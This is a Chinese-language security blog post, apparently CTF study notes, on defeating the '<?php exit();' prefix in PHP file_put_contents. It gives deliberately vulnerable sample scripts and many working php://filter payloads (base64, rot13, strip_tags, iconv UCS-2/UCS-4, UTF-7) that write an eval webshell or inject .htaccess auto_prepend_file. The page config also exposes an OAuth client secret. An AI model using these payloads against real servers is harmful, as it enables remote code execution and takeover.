<!DOCTYPE html><html><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="PHP file_put_contents 的死亡绕过"><meta name="keywords" content="exist"><meta name="author" content="ye1s,undefined"><meta name="copyright" content="ye1s"><title>PHP file_put_contents 的死亡绕过【ye1s】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!-- link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!-- link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!-- script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><!-- script(src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML")--><script src="/js/mathjax/mathjax.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
    tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
});
</script><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"LKL6Q0GQJM","apiKey":"03829f64e2f5c11e4a5e2b8e51e24eb9","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  gitment: {"owner":"ye1sec","repo":"comments","client_id":"d5ece338867af32b6dfa","client_secret":"2caf36bbd47977524017f95105315fc9e65f0577"},
}</script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="ye1s" type="application/atom+xml">
</head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#情况一"><span class="toc-number">1.</span> <span class="toc-text">情况一</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#base64编码绕过"><span class="toc-number">1.1.</span> <span class="toc-text">base64编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rot13-编码绕过"><span class="toc-number">1.2.</span> <span class="toc-text">rot13 编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess的预包含利用"><span class="toc-number">1.3.</span> <span class="toc-text">.htaccess的预包含利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#过滤器编码组合"><span class="toc-number">1.4.</span> <span class="toc-text">过滤器编码组合</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#strip-tags和base64"><span class="toc-number">1.4.1.</span> <span class="toc-text">strip_tags和base64</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#三个过滤器"><span class="toc-number">1.4.2.</span> <span class="toc-text">三个过滤器</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#情况二"><span class="toc-number">2.</span> <span class="toc-text">情况二</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#htacess包含"><span class="toc-number">2.1.</span> <span class="toc-text">.htacess包含</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Base64"><span class="toc-number">2.2.</span> <span class="toc-text">Base64</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#去掉等号之过滤器嵌套base64"><span class="toc-number">2.2.1.</span> <span class="toc-text">去掉等号之过滤器嵌套base64</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#去掉等号之直接对内容进行变性另类base64"><span class="toc-number">2.2.2.</span> <span class="toc-text">去掉等号之直接对内容进行变性另类base64</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rot13"><span class="toc-number">2.3.</span> <span class="toc-text">rot13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#convert-iconv"><span class="toc-number">2.4.</span> <span class="toc-text">convert.iconv</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#usc-2"><span class="toc-number">2.4.1.</span> <span class="toc-text">usc-2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#usc-4"><span class="toc-number">2.4.2.</span> <span class="toc-text">usc-4</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#utf-8与utf-7之间的转化"><span class="toc-number">2.4.3.</span> <span class="toc-text">utf-8与utf-7之间的转化</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#情况三"><span class="toc-number">3.</span> <span class="toc-text">情况三</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">ye1s</div><div class="author-info-description"></div><div class="links-buttons"><a class="links-button button-hover" href="https://github.com/ye1sec" target="_blank">GitHub<i class="icon-dot bg-color0"></i></a><a class="links-button button-hover" href="mailto:431774437@qq.com" target="_blank">E-Mail<i class="icon-dot bg-color2"></i></a><a class="links-button button-hover" href="tencent://message/?uin=431774437&amp;Site=&amp;Menu=yes" target="_blank">QQ<i class="icon-dot bg-color10"></i></a></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">173</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">151</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">12</span></a></div><div class="friend-link"><a class="friend-link-text" href="http://www.m00nback.xyz/" target="_blank">MoonBack</a><a class="friend-link-text" target="_blank">待定</a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a><a class="menu-item" href="/about">关于</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">ye1s</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">PHP file_put_contents 的死亡绕过</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2020-08-30 | 更新于 2020-09-02</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/exist/">exist</a></div></div></div><div class="main-content"><p>php的死亡绕过</p>
<a id="more"></a>
<p>file_put_content大概有三种情形出现；</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file_put_contents(<span class="variable">$filename</span>,<span class="string">"&lt;?php exit();"</span>.<span class="variable">$content</span>);</span><br><span class="line">file_put_contents(<span class="variable">$content</span>,<span class="string">"&lt;?php exit();"</span>.<span class="variable">$content</span>);</span><br><span class="line">file_put_contents(<span class="variable">$filename</span>,<span class="variable">$content</span> . <span class="string">"\nxxxxxx"</span>);</span><br></pre></td></tr></table></figure>
<h1 id="情况一"><a href="#情况一" class="headerlink" title="情况一"></a>情况一</h1><p>示例代码<br>f1.php </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$filename=$_GET[<span class="string">'filename'</span>];</span><br><span class="line">$content=$_POST[<span class="string">'content'</span>];</span><br><span class="line">file_put_contents($filename,<span class="string">"&lt;?php exit();"</span>.$content);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="base64编码绕过"><a href="#base64编码绕过" class="headerlink" title="base64编码绕过"></a>base64编码绕过</h2><p>这里需要将$content加了一个a，是因为base64在解码的时候是将4个字节转化为3个字节，不符合base64编码的字符范围将被忽略，所以最终被解码的字符仅有“phpexit”,所以补上一位就可以完全转化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$str=<span class="string">"&lt;?php phpinfo();?&gt;"</span>;</span><br><span class="line">$encode=base64_encode($str);</span><br><span class="line"><span class="keyword">print</span>($encode);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="../../images/php/exit/1.png" alt="png"></p>
<h2 id="rot13-编码绕过"><a href="#rot13-编码绕过" class="headerlink" title="rot13 编码绕过"></a>rot13 编码绕过</h2><p>ROT13 编码把每一个字母在字母表中向前移动 13 个字母。数字和非字母字符保持不变。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="variable">$str</span>=<span class="string">"&lt;?php phpinfo();?&gt;"</span>;</span><br><span class="line"><span class="variable">$encode</span>=str_rot13(<span class="variable">$str</span>);</span><br><span class="line"><span class="built_in">print</span>(<span class="variable">$encode</span>);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>利用条件：<br>在PHP不开启short_open_tag时，php不认识<code>&lt;?cuc rkvg();</code>这个字符串，当然也就不会执行了。<br><img src="../../images/php/exit/2.png" alt="png"></p>
<h2 id="htaccess的预包含利用"><a href="#htaccess的预包含利用" class="headerlink" title=".htaccess的预包含利用"></a>.htaccess的预包含利用</h2><p>strip_tags()  (php7.3后移除)函数剥去字符串中的 HTML、XML 以及 PHP 的标签。</p>
<p>利用 .htaccess的预包含文件的功能来进行攻破；自定义包含我们的flag文件    </p>
<p>利用条件： flag文件的位置，和文件的名字   </p>
<p><img src="../../images/php/exit/3.png" alt="png">  </p>
<p>这里引用了string.strip_tags过滤器，可以过滤.htaccess内容的html标签，自然也就消除了死亡代码；$content即闭合死亡代码使其完全消除，并且写入自定义包含文件。  </p>
<h2 id="过滤器编码组合"><a href="#过滤器编码组合" class="headerlink" title="过滤器编码组合"></a>过滤器编码组合</h2><h3 id="strip-tags和base64"><a href="#strip-tags和base64" class="headerlink" title="strip_tags和base64"></a>strip_tags和base64</h3><p>利用string.strip_tags可以过滤掉html标签，将标签内的所有内容进行删去，然后再进行base64解码，成功写入shell。<br><img src="../../images/php/exit/4.png" alt="png"></p>
<h3 id="三个过滤器"><a href="#三个过滤器" class="headerlink" title="三个过滤器"></a>三个过滤器</h3><p>本地没试成功 </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$filename</span>=php://filter/zlib.deflate|string.tolower|zlib.inflate|/resource=s1mple.php</span><br><span class="line"><span class="variable">$content</span>=php://filter/zlib.deflate|string.tolower|zlib.inflate|?&gt;&lt;?php%0dphpinfo();?&gt;/resource=s1mple.php</span><br></pre></td></tr></table></figure>
<p>具体看<a href="https://xz.aliyun.com/t/8163#toc-5" target="_blank" rel="noopener">https://xz.aliyun.com/t/8163#toc-5</a>    </p>
<h1 id="情况二"><a href="#情况二" class="headerlink" title="情况二"></a>情况二</h1><p>示例代码<br>f2.php  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$content=$_GET[<span class="string">'content'</span>];</span><br><span class="line">file_put_contents($content,<span class="string">"&lt;?php exit();"</span>.$content);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="htacess包含"><a href="#htacess包含" class="headerlink" title=".htacess包含"></a>.htacess包含</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f2.php?content&#x3D;php:&#x2F;&#x2F;filter&#x2F;write&#x3D;string.strip_tags&#x2F;?&gt;php_value%20auto_prepend_file%20&#x2F;flag%0a%23&#x2F;resource&#x3D;.htaccess</span><br></pre></td></tr></table></figure>
<p><img src="../../images/php/exit/5.png" alt="png">  </p>
<h2 id="Base64"><a href="#Base64" class="headerlink" title="Base64"></a>Base64</h2><p>payload：：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php://filter/convert.base64-decode/PD9waHAgcGhwaW5mbygpOz8+/resource=s1mple.php</span><br><span class="line">php://filter/convert.base64-decode/resource=PD9waHAgcGhwaW5mbygpOz8+.php</span><br></pre></td></tr></table></figure>
<p>看起来顺理成章，进行拼接之后就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php exit();php:&#x2F;&#x2F;filter&#x2F;convert.base64-decode&#x2F;resource&#x3D;PD9waHAgcGhwaW5mbygpOz8+.php</span><br></pre></td></tr></table></figure>
<p>然后会对其进行一次整体的base64-decode。从而分解掉死亡代码，但是有个小问题，当时我也有点不解，一直无法生成content；虽然文件创建成功，但是就是无法生成content。<br>原因：</p>
<blockquote>
<p>‘=’在base64中的作用是填充，也就是以为着结束；在‘=’的后面是不允许有任何其他字符的否则会报错，有的解码程序会自动忽略后面的字符从而正常解码，其实实际上还是有问题的</p>
</blockquote>
<h3 id="去掉等号之过滤器嵌套base64"><a href="#去掉等号之过滤器嵌套base64" class="headerlink" title="去掉等号之过滤器嵌套base64"></a>去掉等号之过滤器嵌套base64</h3><p>payload</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/string.strip.tags|convert.base64-decode/resource=?&gt;PD9waHAgcGhwaW5mbygpOz8%2B.php</span><br></pre></td></tr></table></figure>
<p>发现可以生成文件，并且可以看到我们已经成功写入了shell；但是文件名确实有问题，当我们在浏览器访问的时候，会出现访问不到的问题，这里是因为引号的问题；那么如何避免，我们可以使用伪目录的方法，进行变相的绕过去；   </p>
<p>改payload为此：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;write&#x3D;string.strip_tags|convert.base64-decode&#x2F;resource&#x3D;?&gt;PD9waHAgcGhwaW5mbygpOz8%2B&#x2F;..&#x2F;phpinfo.php</span><br></pre></td></tr></table></figure>
<p>我们将前面的一串base64字符和闭合的符号整体看作一个目录，虽然没有，但是我们后面重新撤回了原目录，生成phpinfo.php文件<br><img src="../../images/php/exit/6.png" alt="png">  </p>
<h3 id="去掉等号之直接对内容进行变性另类base64"><a href="#去掉等号之直接对内容进行变性另类base64" class="headerlink" title="去掉等号之直接对内容进行变性另类base64"></a>去掉等号之直接对内容进行变性另类base64</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f2.php?content&#x3D;php:&#x2F;&#x2F;filter&#x2F;&lt;?|string.strip_tags|convert.base64-decode&#x2F;resource&#x3D;?&gt;PD9waHAgcGhwaW5mbygpOz8%2B&#x2F;..&#x2F;phpinfo.php</span><br></pre></td></tr></table></figure>
<p>这种payload的攻击原理即是首先直接在内容时，就将我们base64遇到的‘=’这个问题直接写在<? ?>中进行过滤掉，然后base64-decode再对原本内容的&lt;?php exit();进行转码，从而达到分解死亡代码的效果<br><img src="../../images/php/exit/7.png" alt="png"></p>
<h2 id="rot13"><a href="#rot13" class="headerlink" title="rot13"></a>rot13</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f2.php?content=php:<span class="comment">//filter/write=string.rot13|<span class="meta">&lt;?</span>cuc cucvasb();<span class="meta">?&gt;</span>|/resource=phpinfo.php</span></span><br></pre></td></tr></table></figure>
<p><img src="../../images/php/exit/8.png" alt="png"></p>
<h2 id="convert-iconv"><a href="#convert-iconv" class="headerlink" title="convert.iconv"></a>convert.iconv</h2><p>这个过滤器需要 php 支持 iconv，而 iconv 是默认编译的。使用<code>convert.iconv.*</code>过滤器等同于用iconv()函数处理所有的流数据。 然而 我们可以留意到 iconv — 字符串按要求的字符编码来转换;<br>其用法：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">iconv ( string <span class="variable">$in_charset</span> , string <span class="variable">$out_charset</span> , string <span class="variable">$str</span> )  </span><br><span class="line">string 将字符串 str 从 in_charset 转换编码到 out_charset</span><br></pre></td></tr></table></figure>
<h3 id="usc-2"><a href="#usc-2" class="headerlink" title="usc-2"></a>usc-2</h3><p>通过usc-2的编码进行转换；对目标字符串进行2位一反转；（因为是两位一反转，所以字符的数目需要保持在偶数位上）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$str=<span class="string">'&lt;?php @eval($_POST[y]); ?&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> iconv(<span class="string">"UCS-2LE"</span>,<span class="string">"UCS-2BE"</span>,$str);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f2.php?content=php://filter/write=string.strip_tags/?&gt;php_value%20auto_prepend_file%20D:\env\phpstudy_pro\WWW\flag%0a%23/resource=.htaccess</span><br></pre></td></tr></table></figure>
<p><img src="../../images/php/exit/9.png" alt="png"></p>
<h3 id="usc-4"><a href="#usc-4" class="headerlink" title="usc-4"></a>usc-4</h3><p>活用convert.iconv。可以进行usc-4编码转化；就是4位一反转；类比可知，构造的shell代码应该是usc-4中的4倍数；</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$str=<span class="string">'&lt;?php @eval($_POST["y"]); ?&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> iconv(<span class="string">"UCS-4LE"</span>,<span class="string">"UCS-4BE"</span>,$str);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f2.php?content=php://filter/convert.iconv.UCS-4LE.UCS-4BE|hp?&lt;e@ p(lavOP_$<span class="string">"[TS)]"</span>y&gt;? ;/resource=phpinfo.php</span><br></pre></td></tr></table></figure>
<p><img src="../../images/php/exit/10.png" alt="png"></p>
<h3 id="utf-8与utf-7之间的转化"><a href="#utf-8与utf-7之间的转化" class="headerlink" title="utf-8与utf-7之间的转化"></a>utf-8与utf-7之间的转化</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> iconv(<span class="string">"UTF-8"</span>,<span class="string">"UTF-7"</span>,<span class="string">"="</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n"</span>;</span><br><span class="line"><span class="keyword">echo</span> iconv(<span class="string">"UTF-8"</span>,<span class="string">"UTF-7"</span>,<span class="string">"PD9waHAgcGhwaW5mbygpOz8+"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output:</span></span><br><span class="line"><span class="comment">//+AD0-</span></span><br><span class="line"><span class="comment">//PD9waHAgcGhwaW5mbygpOz8+-</span></span><br></pre></td></tr></table></figure>
<p>这里发现生成的是<code>+AD0-</code>,然而经过检测，此字符串可以被base64进行解码；那也就意味着我们可以使用这种方法避免等号对我们base64解码的影响；我们可以直接写入base64加密后的payload，然后将其进行utf之间的转换，因为纯字符转换之后还是其本身；所以其不受影响，进而我们的base64-encode之后的编码依然是存在的，然后进行base64-decode一下，写入shell<br>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f2.php?content&#x3D;php:&#x2F;&#x2F;filter&#x2F;write&#x3D;PD9waHAgcGhwaW5mbygpOz8+|convert.iconv.utf-8.utf-7|convert.base64-decode&#x2F;resource&#x3D;phpinfo.php</span><br></pre></td></tr></table></figure>
<p><img src="../../images/php/exit/11.png" alt="png"></p>
<h1 id="情况三"><a href="#情况三" class="headerlink" title="情况三"></a>情况三</h1><p>f3.php </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line"><span class="variable">$content</span>=<span class="variable">$_POST</span>[<span class="string">'content'</span>];</span><br><span class="line"><span class="variable">$filename</span>=<span class="variable">$_GET</span>[<span class="string">'filename'</span>];</span><br><span class="line">file_put_contents(<span class="variable">$filename</span>, <span class="variable">$content</span>.<span class="string">"\njust_test"</span>);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这种情形一般考点都是禁止有特殊起始符和结束符号的语言，举个例子，如果题目没有ban掉php，那么我们可以轻而易举的写入php代码，因为php代码有特殊的起始符和结束符，所以后面的杂糅代码，并不会对其产生什么影响<br><img src="../../images/php/exit/12.png" alt="png"></p>
<p>所以这类问题的考点，往往在于我们没有办法去写入这类的有特殊起始符和结束符号的语言，往往是需要想办法处理掉杂糅代码的。</p>
<p>常见的考点是利用.htaccess进行操作；都知道，.htaccess文件对其文件内容的格式很敏感，如果有杂糅的字符，就会出现错误，导致我们无法进行操作，所以这里我们必须采用注释符将杂糅的代码进行注释，然后才可以正常访问。      </p>
<p>这里对于换行符我们直接进行<code>\n</code>注释即可。然后再嵌入<code>#</code>注释符，从而达到单行注释就可以将杂糅代码注释掉的效果；载荷效果如下<br><img src="../../images/php/exit/13.png" alt="png"></p>
<p>参考文章：</p>
<p><a href="https://xz.aliyun.com/t/8163" target="_blank" rel="noopener">file_put_content和死亡·杂糅代码之缘</a></p>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ye1s</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="https://blog.cfyqy.com/article/13364c14.html">https://blog.cfyqy.com/article/13364c14.html</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://blog.cfyqy.com">ye1s</a>！</span></div></div><div class="post-copyright" id="comments-container"><script src="/js/comments/gitment.js"></script></div><script>let arr = location.href.split('/#more')[0].split('/');
let title = arr[arr.length - 1];
if (title === '') {
    title = arr[arr.length - 2]
}
var flag = false;
var gitFun = function () {
    try {
        var gitmentObj = window.GLOBAL_CONFIG.gitment;
        var gitment = new Gitment({
            id: decodeURI(title), // 可选。默认为 location.href
            owner: gitmentObj.owner,
            repo: gitmentObj.repo,
            oauth: {
                client_id: gitmentObj.client_id,
                client_secret: gitmentObj.client_secret
            },
        });
        gitment.render('comments-container');
        flag = true;
    } catch (e) {
        flag = false;
    }
}
var setIn = setInterval(() => {
    if (!flag) {
        gitFun();
    } else {
        clearInterval(setIn);
    }
}, 200);</script></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/article/2b398cc5.html"><i class="fas fa-angle-left">&nbsp;</i><span>htaccess简识</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/article/afd97ba6.html"><span>PHP安装配置</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fas fa-file-o"></i></span><span id="busuanzi_value_page_pv"></span><span></span></div><div class="copyright">&copy;2017 ～ 2021 By ye1s</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/daovoice.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>